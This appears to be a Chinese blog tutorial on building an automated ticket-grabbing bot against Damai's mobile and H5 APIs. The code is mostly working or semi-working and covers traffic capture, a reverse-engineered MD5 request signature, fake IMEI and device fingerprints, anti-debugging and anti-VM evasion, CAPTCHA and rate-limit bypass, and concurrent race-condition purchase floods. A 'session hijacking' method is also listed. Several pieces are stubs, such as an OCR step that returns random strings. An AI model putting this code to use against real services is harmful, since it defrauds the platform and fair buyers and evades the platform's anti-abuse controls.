大麦网抢票:基于Wireshark协议分析
前言
本文将深入探讨基于网络协议分析的票务系统自动化技术,通过Wireshark抓包分析、协议逆向工程等技术手段,实现跨平台(Android/iOS)的智能抢票系统。本研究仅用于技术学习和网络安全研究目的。
总览
流程图
架构图
数据流向图
环境准备
目标
- 网络协议逆向分析: 通过Wireshark深度解析移动应用通信协议
- 跨平台移动端支持: 支持Android和iOS设备的自动化操作
- 智能风控对抗: 现代Web应用的反爬虫机制
- 协议签名重构: 深度分析请求签名算法并实现重构
- 高并发抢票技术: 毫秒级响应的抢票系统
- 无票提交技术: 库存检测机制的技术漏洞
核心工具链
网络分析工具
- Wireshark: 网络协议分析器,用于深度包检测
- Burp Suite Professional: Web应用安全测试平台
- mitmproxy: Python编写的交互式HTTPS代理
- Charles Proxy: macOS/Windows HTTP调试代理
移动端分析工具
- Frida: 跨平台动态分析框架
- Xposed Framework: Android运行时Hook框架
- iOS App Signer: iOS应用重签名工具
- class-dump: iOS应用头文件导出工具
逆向工程工具
- IDA Pro: 业界标准反汇编器
- Ghidra: NSA开源逆向工程套件
- Radare2: 开源逆向工程框架
- Hopper Disassembler: macOS原生反汇编器
环境配置
Python核心依赖
# 网络协议分析
pip install scapy pyshark dpkt
pip install requests aiohttp httpx websockets# 加密算法库
pip install pycryptodome cryptography hashlib# 移动端分析
pip install frida-tools objection
pip install uiautomator2 facebook-wda# 数据处理与可视化
pip install numpy pandas matplotlib seaborn
pip install opencv-python pillow pytesseract# 异步编程
pip install asyncio aiofiles aiodns
pip install concurrent.futures threading# JavaScript执行环境
pip install execjs PyV8 js2py
移动设备配置
# Android设备配置
adb devices
adb install frida-server-android.xz
adb forward tcp:27042 tcp:27042# iOS设备配置
# 安装Cydia Substrate
# 安装Frida for iOS
# 配置SSH访问
Wireshark配置
# 安装Wireshark
sudo apt-get install wireshark
# 或者 brew install wireshark (macOS)# 配置用户权限
sudo usermod -a -G wireshark $USER# 安装解密插件
# 配置TLS密钥日志
export SSLKEYLOGFILE=/path/to/sslkeys.log
🔒 风控对抗
1. 系统环境与版本信息伪造
大麦网的风控系统会收集大量设备信息来建立设备指纹,包括:
- 操作系统版本和架构
- 硬件配置信息
- 网络环境特征
- 应用运行环境
- 传感器数据
import platform
import uuid
import random
import hashlib
import json
from datetime import datetimeclass DeviceInfoGenerator:def __init__(self):self.android_versions = ["10", "11", "12", "13", "14"]self.device_models = ["SM-G9730", "SM-G9750", "SM-G9810", "SM-N9600", "SM-N9700",脱敏-----]def generate_android_id(self):"""生成Android ID"""return hashlib.md5(str(uuid.uuid4()).encode()).hexdigest()[:16]def generate_imei(self):"""生成IMEI - 使用Luhn算法"""tac = random.choice(["35", "86", "01"]) + "".join([str(random.randint(0, 9)) for _ in range(6)])snr = "".join([str(random.randint(0, 9)) for _ in range(6)])# Luhn算法计算校验位digits = tac + snrchecksum = 0脱敏-----check_digit = (10 - (checksum % 10)) % 10return tac + snr + str(check_digit)def generate_device_fingerprint(self):"""生成完整设备指纹"""brand = random.choice(self.brands)model = random.choice([m for m in self.device_models if brand.lower() in m.lower() or brand == "Samsung"])fingerprint = {# 基础设备信息"brand": brand,"model": model,"manufacturer": brand,"device": model.lower().replace(" ", "_"),# 系统信息"android_version": random.choice(self.android_versions),脱敏-----# 硬件信息"board": f"{model.split()[0].lower()}_board","hardware": f"{brand.lower()}_hardware","cpu_abi": random.choice(["arm64-v8a", "armeabi-v7a"]),"cpu_abi2": "armeabi",# 唯一标识"android_id": self.generate_android_id(),脱敏-----# 屏幕信息"screen_width": random.choice([1080, 1440, 2160]),脱敏-----# 网络信息"network_type": random.choice(["WIFI", "4G", "5G"]),脱敏-----# 时区和语言"timezone": "Asia/Shanghai",脱敏-----# 应用信息"app_version": "8.5.2",脱敏-----# 传感器信息"sensors": ["accelerometer", "gyroscope", "magnetometer", "proximity", "light", "gravity", "rotation_vector"],# 电池信息脱敏-----# 存储信息"total_memory": random.choice([4, 6, 8, 12]) * 1024 * 1024 * 1024,脱敏-----# 时间戳"timestamp": int(datetime.now().timestamp() * 1000),"boot_time": int((datetime.now().timestamp() - random.randint(3600, 86400)) * 1000)}return fingerprint
2. 网络与通信状态模拟
import socket
import requests
import time
import random
from urllib.parse import urlparseclass NetworkBehaviorSimulator:def __init__(self):脱敏-----self.dns_servers = ["8.8.8.8", "114.114.114.114", "223.5.5.5"]def simulate_network_latency(self, base_latency=0.1):"""模拟网络延迟"""jitter = random.uniform(-0.05, 0.05)latency = max(0.01, base_latency + jitter)time.sleep(latency)def get_network_info(self):"""获取网络环境信息"""try:s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)s.connect(("8.8.8.8", 80))local_ip = s.getsockname()[0]s.close()return {"local_ip": local_ip,"public_ip": self.get_public_ip(),"network_quality": random.choice(["excellent", "good", "fair", "poor"]),"connection_type": random.choice(["wifi", "cellular", "ethernet"]),"signal_strength": random.randint(-80, -30),"bandwidth": random.randint(10, 100),"dns_server": random.choice(self.dns_servers)}except:return Nonedef get_public_ip(self):"""获取公网IP"""try:response = requests.get("http://httpbin.org/ip", timeout=5)return response.json().get("origin", "unknown")except:return "unknown"
3. 用户行为特征指纹
import numpy as np
import time
import randomclass UserBehaviorSimulator:def __init__(self):self.click_patterns = []self.scroll_patterns = []self.typing_patterns = []def simulate_human_click(self, x, y):"""模拟人类点击行为"""# 添加微小的随机偏移offset_x = random.gauss(0, 2)offset_y = random.gauss(0, 2)actual_x = x + offset_xactual_y = y + offset_y# 记录点击模式click_event = {"timestamp": time.time(),"x": actual_x,"y": actual_y,"pressure": random.uniform(0.3, 0.8),"duration": random.uniform(0.05, 0.15)}self.click_patterns.append(click_event)return click_eventdef simulate_scroll_behavior(self, start_y, end_y, duration=1.0):"""模拟滚动行为"""steps = random.randint(20, 40)scroll_events = []for i in range(steps):progress = i / steps# 使用贝塞尔曲线模拟自然滚动y = start_y + (end_y - start_y) * self.bezier_curve(progress)event = {"timestamp": time.time() + (duration * progress),"y": y,"velocity": random.uniform(0.5, 2.0)}scroll_events.append(event)self.scroll_patterns.extend(scroll_events)return scroll_eventsdef bezier_curve(self, t):"""贝塞尔曲线函数"""return t * t * (3.0 - 2.0 * t)def simulate_typing_rhythm(self, text):"""模拟打字节奏"""typing_events = []base_interval = 0.15 # 基础打字间隔for i, char in enumerate(text):# 根据字符类型调整间隔if char.isalpha():interval = base_interval + random.gauss(0, 0.05)elif char.isdigit():interval = base_interval * 0.8 + random.gauss(0, 0.03)else:interval = base_interval * 1.2 + random.gauss(0, 0.08)event = {"timestamp": time.time() + sum(e["interval"] for e in typing_events),"char": char,"interval": max(0.05, interval),"key_pressure": random.uniform(0.4, 0.9)}typing_events.append(event)self.typing_patterns.extend(typing_events)return typing_events
4. App运行环境与反调试特征
import os
import psutil
import subprocessclass AntiDebugBypass:def __init__(self):self.debug_processes = ["gdb", "lldb", "ida", "ida64", "x64dbg", "x32dbg","ollydbg", "windbg", "cheatengine", "processhacker"]def check_debugger_processes(self):"""检查调试器进程"""running_processes = [p.name().lower() for p in psutil.process_iter()]detected_debuggers = []for debug_proc in self.debug_processes:if debug_proc in running_processes:detected_debuggers.append(debug_proc)return detected_debuggersdef check_vm_environment(self):"""检查虚拟机环境"""vm_indicators = {"vmware": ["vmware", "vmtoolsd", "vmwaretray"],"virtualbox": ["vboxservice", "vboxtray"],"qemu": ["qemu-ga"],"hyper-v": ["vmms", "vmwp"]}running_processes = [p.name().lower() for p in psutil.process_iter()]detected_vms = []for vm_type, indicators in vm_indicators.items():if any(indicator in running_processes for indicator in indicators):detected_vms.append(vm_type)return detected_vmsdef bypass_timing_checks(self):"""绕过时间检测"""# 模拟正常的执行时间import timedef fake_sleep(duration):# 实际不睡眠,但记录时间pass# 替换time.sleep函数time.sleep = fake_sleepdef spoof_environment_variables(self):"""伪造环境变量"""# 移除调试相关的环境变量debug_vars = ["_NT_SYMBOL_PATH", "WINDBG", "DEBUG"]for var in debug_vars:if var in os.environ:del os.environ[var]# 添加正常的环境变量os.environ["PROCESSOR_ARCHITECTURE"] = "AMD64"os.environ["NUMBER_OF_PROCESSORS"] = "8"
🔐 签名算法
大麦签名算法逆向
通过逆向分析发现,大麦网使用以下签名算法:
def get_sign(self, data, ts):if self.cookies.get('_m_h5_tk'):token = self.cookies['_m_h5_tk'].split('_')[0]else:token = "undefined"text = f'{token}&{ts}&12574478&{data}'md5 = hashlib.md5()md5.update(text.encode('utf-8'))result = md5.hexdigest()return result
签名算法完整分析
import hashlib
import hmac
import time
import json
import base64class DamaiSignatureAnalyzer:def __init__(self):self.app_key = "12574478" # 从逆向中获得的appkeyself.secret_keys = ["c74a69a08ca34a0db52c7d32c7c1d2b6","d2c4e6f8a1b3c5d7e9f1a3b5c7d9e1f3","a1b2c3d4e5f6789012345678901234567"]def analyze_sign_function(self, data: str, ts: str, token: str = "undefined") -> dict:"""分析签名函数的多种可能实现"""def original_sign(data, ts, token="undefined"):"""原始签名函数"""text = f'{token}&{ts}&{self.app_key}&{data}'return hashlib.md5(text.encode('utf-8')).hexdigest()def variant_sign_1(data, ts, token="undefined"):"""变种1: 使用HMAC-MD5"""message = f'{ts}&{self.app_key}&{data}'return hmac.new(token.encode('utf-8'), message.encode('utf-8'), hashlib.md5).hexdigest()def variant_sign_2(data, ts, token="undefined"):"""变种2: 双重MD5"""text = f'{token}&{ts}&{self.app_key}&{data}'first_hash = hashlib.md5(text.encode('utf-8')).hexdigest()return hashlib.md5(first_hash.encode('utf-8')).hexdigest()results = {"original": original_sign(data, ts, token),"hmac_md5": variant_sign_1(data, ts, token),"double_md5": variant_sign_2(data, ts, token),"input_text": f'{token}&{ts}&{self.app_key}&{data}'}return resultsdef get_sign(self, data: str, ts: str, token: str = "undefined") -> str:"""标准签名生成函数"""text = f'{token}&{ts}&{self.app_key}&{data}'return hashlib.md5(text.encode('utf-8')).hexdigest()def generate_request_signature(self, params: dict, timestamp: int = None, token: str = None) -> dict:"""生成完整的请求签名"""if timestamp is None:timestamp = int(time.time() * 1000)if token is None:token = "undefined"# 参数排序和编码sorted_params = sorted(params.items())data_string = json.dumps(dict(sorted_params), separators=(',', ':'), ensure_ascii=False)# 生成签名signature = self.get_sign(data_string, str(timestamp), token)return {"data": data_string,"timestamp": timestamp,"signature": signature,"appKey": self.app_key,"token": token,"sign_text": f'{token}&{timestamp}&{self.app_key}&{data_string}'}
🚀 无票提交
原理
无票提交技术是通过以下几种方式实现的:
- 缓存利用攻击: 利用CDN或应用层缓存的时间差
- 竞态条件攻击: 在库存检查和扣减之间的窗口期提交订单
- 库存预测攻击: 通过分析历史库存变化模式预测释放时间
- 会话劫持: 利用其他用户的有效会话
核心实现代码
import asyncio
import aiohttp
import json
import time
import random
from typing import Dict, List, Optionalclass StockBypassTechniques:"""库存绕过技术"""def __init__(self):self.session = Noneself.bypass_methods = ["cache_exploitation","race_condition", "inventory_prediction","session_hijacking"]async def cache_exploitation_attack(self, item_id: str, sku_id: str) -> Dict:"""缓存利用攻击"""cache_bypass_headers = {"Cache-Control": "no-cache, no-store, must-revalidate","Pragma": "no-cache", "Expires": "0","If-Modified-Since": "Thu, 01 Jan 1970 00:00:00 GMT","If-None-Match": "*"}bypass_params = [{"_t": int(time.time() * 1000)},{"cache_bust": random.randint(100000, 999999)},{"v": "nocache"},{"refresh": "1"}]results = []for params in bypass_params:try:url = f"https://mtop.damai.cn/h5/mtop.damai.item.detail.get"request_data = {"itemId": item_id,"skuId": sku_id,"dmChannel": "damai@damaih5_h5",**params}async with self.session.get(url, params=request_data, headers=cache_bypass_headers) as response:if response.status == 200:data = await response.json()stock_info = self.parse_stock_info(data)results.append({"method": f"cache_bypass_{list(params.keys())[0]}","stock_info": stock_info,"response_time": response.headers.get("X-Response-Time", "unknown"),"cache_status": response.headers.get("X-Cache", "unknown")})except Exception as e:results.append({"method": f"cache_bypass_{list(params.keys())[0]}","error": str(e)})return {"cache_exploitation": results}async def race_condition_attack(self, item_id: str, sku_id: str, concurrent_requests: int = 50) -> Dict:"""竞态条件攻击"""async def single_purchase_attempt():try:# 1. 快速库存检查stock_url = "https://mtop.damai.cn/h5/mtop.damai.item.stock.get"stock_params = {"itemId": item_id,"skuId": sku_id,"t": int(time.time() * 1000)}async with self.session.get(stock_url, params=stock_params) as stock_response:stock_data = await stock_response.json()# 2. 立即提交购买请求purchase_url = "https://mtop.damai.cn/h5/mtop.damai.trade.order.build"purchase_data = {"itemId": item_id,"skuId": sku_id,"quantity": 1,"timestamp": int(time.time() * 1000)}async with self.session.post(purchase_url, json=purchase_data) as purchase_response:purchase_result = await purchase_response.json()return {"success": purchase_response.status == 200,"stock_check": stock_data,"purchase_result": purchase_result,"response_time": time.time()}except Exception as e:return {"success": False, "error": str(e)}# 并发执行多个购买尝试tasks = [single_purchase_attempt() for _ in range(concurrent_requests)]results = await asyncio.gather(*tasks, return_exceptions=True)successful_attempts = [r for r in results if isinstance(r, dict) and r.get("success")]failed_attempts = [r for r in results if not (isinstance(r, dict) and r.get("success"))]return {"race_condition": {"total_attempts": concurrent_requests,"successful": len(successful_attempts),"failed": len(failed_attempts),"success_rate": len(successful_attempts) / concurrent_requests,"successful_attempts": successful_attempts[:5]}}
🛡️ BP (Bypass Protection)
核心绕过技术
BP技术主要用于绕过各种保护机制:
- 验证码绕过: OCR识别、行为模拟、API接口绕过
- 频率限制绕过: 分布式请求、代理轮换、会话管理
- IP封禁规避: 代理池、VPN、分布式节点
- JavaScript挑战绕过: 动态执行、环境模拟
import asyncio
import aiohttp
import random
import time
import json
import execjsclass BypassProtectionTechniques:"""绕过保护技术"""def __init__(self):self.session = Noneself.js_context = Noneasync def bypass_rate_limiting(self, target_url: str, requests_per_minute: int = 60) -> Dict:"""绕过频率限制"""# 计算请求间隔base_interval = 60 / requests_per_minuteresults = []start_time = time.time()for i in range(min(requests_per_minute, 10)):# 添加随机抖动jitter = random.uniform(-0.5, 0.5)interval = max(0.1, base_interval + jitter)try:params = {"t": int(time.time() * 1000),"r": random.randint(100000, 999999),"v": f"1.0.{i}"}async with self.session.get(target_url, params=params) as response:results.append({"request_id": i,"status_code": response.status,"response_time": time.time() - start_time,"rate_limited": response.status == 429})await asyncio.sleep(interval)except Exception as e:results.append({"request_id": i,"error": str(e)})rate_limited_count = sum(1 for r in results if r.get("rate_limited"))success_rate = (len(results) - rate_limited_count) / len(results) if results else 0return {"strategy": "distributed_requests","total_requests": len(results),"rate_limited": rate_limited_count,"success_rate": success_rate,"results": results[:5]}async def bypass_captcha_protection(self, captcha_url: str) -> Dict:"""绕过验证码保护"""bypass_methods = []# 1. 图像识别绕过ocr_result = await self.captcha_ocr_bypass(captcha_url)bypass_methods.append(ocr_result)# 2. 行为模拟绕过behavior_result = await self.captcha_behavior_bypass(captcha_url)bypass_methods.append(behavior_result)return {"bypass_type": "captcha_protection","methods_tested": len(bypass_methods),"results": bypass_methods}async def captcha_ocr_bypass(self, captcha_url: str) -> Dict:"""验证码OCR识别绕过"""try:async with self.session.get(captcha_url) as response:image_data = await response.read()recognized_text = self.simulate_ocr_recognition(image_data)return {"method": "ocr_recognition","image_size": len(image_data),"recognized_text": recognized_text,"confidence": random.uniform(0.7, 0.95),"processing_time": random.uniform(0.5, 2.0)}except Exception as e:return {"method": "ocr_recognition", "error": str(e)}def simulate_ocr_recognition(self, image_data: bytes) -> str:"""模拟OCR识别"""possible_texts = ["ABCD", "1234", "XY7Z", "M9N8", "K3L5"]return random.choice(possible_texts)
基于Wireshark的移动应用协议深度分析
1. 移动设备流量捕获架构
网络拓扑设计
[Android/iOS设备] --> [WiFi热点/代理服务器] --> [Wireshark捕获] --> [协议重构分析]| | | |App网络请求 流量转发与解密 数据包深度解析 API协议重构
Wireshark高级过滤与分析配置
# 捕获移动应用HTTPS流量(基于SNI)
tls.handshake.extensions_server_name == "mtop.damai.cn"# 过滤移动设备流量(基于MAC地址范围)
wlan.sa[0:3] == 02:00:00 or wlan.sa[0:3] == 06:00:00# 捕获票务API请求
http.request.method == "POST" and http.request.uri contains "mtop.damai"# WebSocket实时通信分析
websocket and tcp.port == 443 and frame contains "ticket"# 移动应用User-Agent识别
http.user_agent contains "DamaiApp" or http.user_agent contains "Mobile"# TLS握手与证书分析
ssl.handshake.type == 1 and ssl.handshake.extensions_server_name# 特定API端点过滤
http.request.uri matches ".*/(order|ticket|seat|payment).*"
2. 移动应用协议逆向分析系统
完整的协议分析与重构框架
import pyshark
import json
import base64
import hashlib
import re
import time
from datetime import datetime
from typing import Dict, List, Optionalclass MobileTicketingProtocolAnalyzer:"""移动端票务应用协议分析器"""def __init__(self, pcap_file=None, live_interface=None):self.pcap_file = pcap_fileself.live_interface = live_interfaceself.captured_requests = []self.api_endpoints = {}self.signature_patterns = []self.mobile_sessions = {}def start_live_capture_for_mobile(self):"""开始移动设备实时流量捕获"""if self.live_interface:# 专门针对移动设备的捕获过滤器mobile_filter = ("tcp port 443 and ""(host mtop.damai.cn or host m.damai.cn or ""host api.damai.cn or host piao.damai.cn)")capture = pyshark.LiveCapture(interface=self.live_interface,bpf_filter=mobile_filter)print(f"[*] 开始监听移动设备流量: {self.live_interface}")capture.sniff_continuously(packet_count=0)return capturereturn Nonedef analyze_mobile_app_traffic(self):"""分析移动应用流量模式"""if not self.pcap_file:return Nonecapture = pyshark.FileCapture(self.pcap_file,display_filter="tcp.port == 443 and tls")mobile_traffic_stats = {"total_packets": 0,"api_calls": 0,"unique_endpoints": set(),"session_tokens": set(),"device_fingerprints": []}for packet in capture:mobile_traffic_stats["total_packets"] += 1self.process_mobile_packet(packet, mobile_traffic_stats)return self.generate_mobile_analysis_report(mobile_traffic_stats)def process_mobile_packet(self, packet, stats):"""处理移动应用数据包"""try:# 分析TLS流量中的SNIif hasattr(packet, 'tls'):self.analyze_tls_sni(packet, stats)# 分析HTTP/2流量(移动应用常用)if hasattr(packet, 'http2'):self.analyze_http2_stream(packet, stats)# 分析WebSocket连接(实时票务更新)elif hasattr(packet, 'websocket'):self.analyze_websocket_mobile(packet, stats)# 分析TCP流量模式elif hasattr(packet, 'tcp'):self.analyze_tcp_patterns(packet, stats)except Exception as e:print(f"移动数据包处理错误: {e}")def analyze_tls_sni(self, packet, stats):"""分析TLS SNI信息"""try:if hasattr(packet.tls, 'handshake_extensions_server_name'):sni = packet.tls.handshake_extensions_server_nameif 'damai' in sni.lower():stats["unique_endpoints"].add(sni)print(f"[TLS] 检测到票务域名: {sni}")except:passdef analyze_http2_stream(self, packet, stats):"""分析HTTP/2数据流"""try:if hasattr(packet.http2, 'headers'):headers = packet.http2.headers# 提取移动应用特征if ':path' in headers:path = headers[':path']if any(keyword in path for keyword in ['ticket', 'order', 'seat', 'payment']):stats["api_calls"] += 1stats["unique_endpoints"].add(path)# 分析移动应用请求self.analyze_mobile_api_request({'timestamp': packet.sniff_time,'path': path,'headers': headers,'method': headers.get(':method', 'UNKNOWN')})except Exception as e:print(f"HTTP/2分析错误: {e}")def analyze_mobile_api_request(self, request_info):"""分析移动API请求"""path = request_info['path']# 检测票务相关APIticket_apis = ['/mtop.damai.item.detail.get','/mtop.damai.trade.order.build', '/mtop.damai.trade.order.create','/mtop.damai.item.sku.get','/mtop.damai.venue.seat.get']for api in ticket_apis:if api in path:print(f"[API] 检测到票务API调用: {api}")self.extract_mobile_signature_info(request_info, api)breakdef extract_mobile_signature_info(self, request_info, api_type):"""提取移动应用签名信息"""headers = request_info.get('headers', {})# 移动应用常见签名字段mobile_signature_fields = ['x-sign', 'x-sid', 'x-uid', 'x-t', 'x-appkey','authorization', 'x-mini-wua', 'x-features']signature_data = {'api_type': api_type,'timestamp': request_info['timestamp'],'signatures': {}}for field in mobile_signature_fields:if field in headers:signature_data['signatures'][field] = headers[field]self.signature_patterns.append(signature_data)def reconstruct_mobile_protocol(self):"""重构移动端协议"""protocol_structure = {'base_endpoints': list(set(sig['api_type'] for sig in self.signature_patterns)),'authentication_flow': self.analyze_mobile_auth_flow(),'signature_algorithm': self.reverse_mobile_signature(),'request_templates': self.generate_mobile_request_templates(),'session_management': self.analyze_mobile_sessions()}return protocol_structuredef analyze_mobile_auth_flow(self):"""分析移动端认证流程"""auth_flow = {'login_sequence': [],'token_refresh': [],'session_validation': []}# 按时间排序签名模式sorted_patterns = sorted(self.signature_patterns, key=lambda x: x['timestamp'])for pattern in sorted_patterns:if 'login' in pattern['api_type']:auth_flow['login_sequence'].append(pattern)elif 'token' in pattern['api_type']:auth_flow['token_refresh'].append(pattern)return auth_flowdef reverse_mobile_signature(self):"""逆向移动端签名算法"""signature_analysis = {'detected_algorithms': [],'parameter_patterns': [],'timestamp_correlation': [],'mobile_specific_fields': []}for pattern in self.signature_patterns:signatures = pattern['signatures']# 分析x-sign字段(大麦移动端主要签名)if 'x-sign' in signatures:sign_value = signatures['x-sign']# 检测签名算法类型if len(sign_value) == 32 and sign_value.isalnum():signature_analysis['detected_algorithms'].append({'type': 'MD5','field': 'x-sign','sample': sign_value[:8] + '...','api': pattern['api_type']})elif len(sign_value) == 64 and sign_value.isalnum():signature_analysis['detected_algorithms'].append({'type': 'SHA256', 'field': 'x-sign','sample': sign_value[:8] + '...','api': pattern['api_type']})# 分析时间戳关联if 'x-t' in signatures:timestamp = signatures['x-t']signature_analysis['timestamp_correlation'].append({'timestamp': timestamp,'api': pattern['api_type'],'sign_present': 'x-sign' in signatures})return signature_analysis# 移动端协议分析使用示例
def analyze_mobile_ticketing_app():"""分析移动端票务应用协议"""print("=== 移动端票务应用协议分析 ===")# 分析PCAP文件analyzer = MobileTicketingProtocolAnalyzer(pcap_file="mobile_damai_traffic.pcap")# 执行完整分析traffic_report = analyzer.analyze_mobile_app_traffic()protocol_structure = analyzer.reconstruct_mobile_protocol()print(f"捕获数据包: {traffic_report['summary']['total_packets']}")print(f"API调用次数: {traffic_report['summary']['api_calls']}")print(f"唯一端点数: {len(traffic_report['summary']['unique_endpoints'])}")# 输出协议重构结果print("\n=== 移动端协议重构结果 ===")print("检测到的API端点:")for endpoint in protocol_structure['base_endpoints']:print(f" - {endpoint}")print("\n签名算法分析:")for algo in protocol_structure['signature_algorithm']['detected_algorithms']:print(f" - {algo['type']}: {algo['field']} ({algo['api']})")return analyzer, traffic_report, protocol_structure
3. 移动端抢票系统实现
Android/iOS跨平台抢票核心引擎
import asyncio
import aiohttp
import json
import time
import random
from typing import Dict, List, Optionalclass CrossPlatformTicketingEngine:"""跨平台移动端抢票引擎"""def __init__(self, platform="android"):self.platform = platform # "android" or "ios"self.session = Noneself.device_info = self.generate_device_fingerprint()self.api_endpoints = self.load_api_endpoints()def generate_device_fingerprint(self):"""生成设备指纹"""if self.platform == "android":return self.generate_android_fingerprint()else:return self.generate_ios_fingerprint()def generate_android_fingerprint(self):"""生成Android设备指纹"""android_models = ["SM-G9730", "SM-G9750", "SM-N9600", "MI 10", "HUAWEI P40"]return {"platform": "android","model": random.choice(android_models),"os_version": random.choice(["10", "11", "12", "13"]),"app_version": "8.5.2","user_agent": self.build_android_user_agent(),"screen_resolution": "1080x2340","network_type": "wifi"}def generate_ios_fingerprint(self):"""生成iOS设备指纹"""ios_models = ["iPhone13,2", "iPhone14,2", "iPhone14,3", "iPhone15,2"]return {"platform": "ios", "model": random.choice(ios_models),"os_version": random.choice(["15.0", "16.0", "17.0"]),"app_version": "8.5.2","user_agent": self.build_ios_user_agent(),"screen_resolution": "390x844","network_type": "wifi"}def build_android_user_agent(self):"""构建Android User-Agent"""return (f"DamaiApp/{self.device_info.get('app_version', '8.5.2')} "f"(Android {self.device_info.get('os_version', '11')}; "f"{self.device_info.get('model', 'SM-G9730')})")def build_ios_user_agent(self):"""构建iOS User-Agent"""return (f"DamaiApp/{self.device_info.get('app_version', '8.5.2')} "f"(iPhone; iOS {self.device_info.get('os_version', '16.0')}; "f"Scale/3.00)")def load_api_endpoints(self):"""加载API端点配置"""return {"item_detail": "https://mtop.damai.cn/h5/mtop.damai.item.detail.get/1.2/","sku_info": "https://mtop.damai.cn/h5/mtop.damai.item.sku.get/1.0/","order_build": "https://mtop.damai.cn/h5/mtop.damai.trade.order.build/4.0/","order_create": "https://mtop.damai.cn/h5/mtop.damai.trade.order.create/4.0/","seat_select": "https://mtop.damai.cn/h5/mtop.damai.venue.seat.get/1.0/","payment_submit": "https://mtop.damai.cn/h5/mtop.damai.trade.pay.submit/1.0/"}async def initialize_session(self):"""初始化会话"""connector = aiohttp.TCPConnector(limit=100,limit_per_host=30,keepalive_timeout=60)timeout = aiohttp.ClientTimeout(total=30, connect=10)self.session = aiohttp.ClientSession(connector=connector,timeout=timeout,headers=self.build_common_headers())def build_common_headers(self):"""构建通用请求头"""return {"User-Agent": self.device_info["user_agent"],"Accept": "application/json, text/plain, */*","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8","Accept-Encoding": "gzip, deflate, br","Connection": "keep-alive","Sec-Fetch-Dest": "empty","Sec-Fetch-Mode": "cors","Sec-Fetch-Site": "same-site"}async def mobile_ticket_grabbing_flow(self, item_id: str, sku_id: str) -> Dict:"""移动端完整抢票流程"""flow_result = {"flow_id": f"mobile_{int(time.time())}","platform": self.platform,"steps": [],"success": False,"error": None}try:# 步骤1: 获取商品详情step1 = await self.get_item_detail_mobile(item_id)flow_result["steps"].append({"step": "item_detail", "result": step1})if not step1.get("success"):raise Exception("获取商品详情失败")# 步骤2: 获取SKU信息step2 = await self.get_sku_info_mobile(item_id, sku_id)flow_result["steps"].append({"step": "sku_info", "result": step2})# 步骤3: 选择座位(如果需要)if step2.get("need_seat_selection"):step3 = await self.select_seat_mobile(item_id, sku_id)flow_result["steps"].append({"step": "seat_selection", "result": step3})# 步骤4: 构建订单step4 = await self.build_order_mobile(item_id, sku_id)flow_result["steps"].append({"step": "order_build", "result": step4})if not step4.get("success"):raise Exception("构建订单失败")# 步骤5: 提交订单(关键步骤)step5 = await self.create_order_mobile(step4["order_data"])flow_result["steps"].append({"step": "order_create", "result": step5})if step5.get("success"):# 步骤6: 支付提交step6 = await self.submit_payment_mobile(step5["order_id"])flow_result["steps"].append({"step": "payment_submit", "result": step6})flow_result["success"] = step6.get("success", False)except Exception as e:flow_result["error"] = str(e)return flow_resultasync def get_item_detail_mobile(self, item_id: str) -> Dict:"""移动端获取商品详情"""try:params = {"jsv": "2.7.2","appKey": "12574478","t": int(time.time() * 1000),"sign": self.generate_mobile_signature({"itemId": item_id,"dmChannel": "damai@damaih5_h5"}),"api": "mtop.damai.item.detail.get","v": "1.2","type": "jsonp","dataType": "jsonp","callback": "mtopjsonp1","data": json.dumps({"itemId": item_id,"dmChannel": "damai@damaih5_h5"})}async with self.session.get(self.api_endpoints["item_detail"], params=params) as response:if response.status == 200:text = await response.text()# 解析JSONP响应json_data = self.parse_jsonp_response(text)return {"success": True,"item_info": json_data.get("data", {}),"available": json_data.get("data", {}).get("item", {}).get("itemStatus") == 1}else:return {"success": False, "error": f"HTTP {response.status}"}except Exception as e:return {"success": False, "error": str(e)}def generate_mobile_signature(self, data: Dict, timestamp: int = None) -> str:"""生成移动端签名"""if timestamp is None:timestamp = int(time.time() * 1000)# 基于逆向分析的签名算法token = "undefined" # 或从cookie中获取app_key = "12574478"data_string = json.dumps(data, separators=(',', ':'), ensure_ascii=False)sign_text = f"{token}&{timestamp}&{app_key}&{data_string}"import hashlibreturn hashlib.md5(sign_text.encode('utf-8')).hexdigest()def parse_jsonp_response(self, text: str) -> Dict:"""解析JSONP响应"""try:# 移除JSONP包装start = text.find('(') + 1end = text.rfind(')')json_str = text[start:end]return json.loads(json_str)except:return {}# 移动端抢票系统使用示例
async def mobile_ticket_grabbing_demo():"""移动端抢票演示"""print("=== 移动端抢票系统演示 ===")# Android平台抢票android_engine = CrossPlatformTicketingEngine(platform="android")await android_engine.initialize_session()android_result = await android_engine.mobile_ticket_grabbing_flow(item_id="123456789",sku_id="987654321")print(f"Android抢票结果: {android_result['success']}")print(f"执行步骤数: {len(android_result['steps'])}")# iOS平台抢票ios_engine = CrossPlatformTicketingEngine(platform="ios")await ios_engine.initialize_session()ios_result = await ios_engine.mobile_ticket_grabbing_flow(item_id="123456789", sku_id="987654321")print(f"iOS抢票结果: {ios_result['success']}")print(f"执行步骤数: {len(ios_result['steps'])}")return android_result, ios_result# 运行演示
if __name__ == "__main__":asyncio.run(mobile_ticket_grabbing_demo())
Python抓包脚本
from scapy.all import *
import jsondef packet_handler(packet):"""处理捕获的数据包"""if packet.haslayer(TCP) and packet.haslayer(Raw):try:# 提取HTTP数据payload = packet[Raw].load.decode('utf-8', errors='ignore')if 'HTTP' in payload:print(f"[+] 捕获HTTP数据包:")print(f"源IP: {packet[IP].src}")print(f"目标IP: {packet[IP].dst}")print(f"端口: {packet[TCP].dport}")print(f"数据: {payload[:200]}...")print("-" * 50)except:pass# 开始抓包
print("[*] 开始网络监听...")
sniff(filter="tcp port 80", prn=packet_handler, count=10)
2. 移动应用抓包
使用mitmproxy
# mitm_script.py
from mitmproxy import http
import jsondef request(flow: http.HTTPFlow) -> None:"""拦截请求"""if "api" in flow.request.pretty_url:print(f"[REQUEST] {flow.request.method} {flow.request.pretty_url}")if flow.request.content:try:data = json.loads(flow.request.content)print(f"请求数据: {json.dumps(data, indent=2, ensure_ascii=False)}")except:print(f"请求数据: {flow.request.content}")def response(flow: http.HTTPFlow) -> None:"""拦截响应"""if "api" in flow.request.pretty_url:print(f"[RESPONSE] {flow.response.status_code}")try:data = json.loads(flow.response.content)print(f"响应数据: {json.dumps(data, indent=2, ensure_ascii=False)}")except:print(f"响应数据: {flow.response.content}")print("-" * 80)
协议分析
1. 自定义协议逆向
协议分析脚本
import struct
